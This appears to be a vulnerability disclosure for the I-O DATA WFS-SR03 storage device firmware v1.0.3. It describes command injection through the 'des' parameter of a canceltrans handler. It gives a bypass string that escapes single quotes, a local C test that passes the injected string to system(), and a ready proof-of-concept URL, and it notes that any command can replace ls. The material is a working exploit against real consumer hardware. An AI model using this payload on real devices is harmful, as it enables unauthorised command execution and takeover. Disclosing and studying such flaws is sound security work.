IoData:WFS-SR03 v1.0.3(2022/11/14)
https://www.iodata.jp/lib/software/w/2176.htm
Controllable pro_stor_canceltrans_handler_part_19 function des parameter in IOS, resulting in arbitrary command injection
The parameter v2 is first obtained from the des parameter in the http request (user controllable), then checks whether v2 ends with / and returns the length v8, as you can see in the figure below, the loop checks whether it is / and copies the string to a1, so you only need to construct the string as id | www/ to bypass
At this point sprintf (v7, "% s'% s'", "stopcp", v8); this also needs to bypass the single quote restriction
Local bypass test:
#include <stdio.h>
#include <string.h>
int file_exists(char *filename);
int main(void)
{
char v7[2048];
char *v8 = "www';ls;'test/";
sprintf(v7, "%s '%s'", "stopcp", v8);
system(v7);
return 0;
}
Successfully bypassed!
So finally construct payload = www '; ls;' test/ and call system to execute.
Can replace ls with arbitrary command execution
poc:
<http://127.0.0.1/protocol.csp?fname=system&opt=canceltrans&src=test&des=www';ls;'test/&function=set>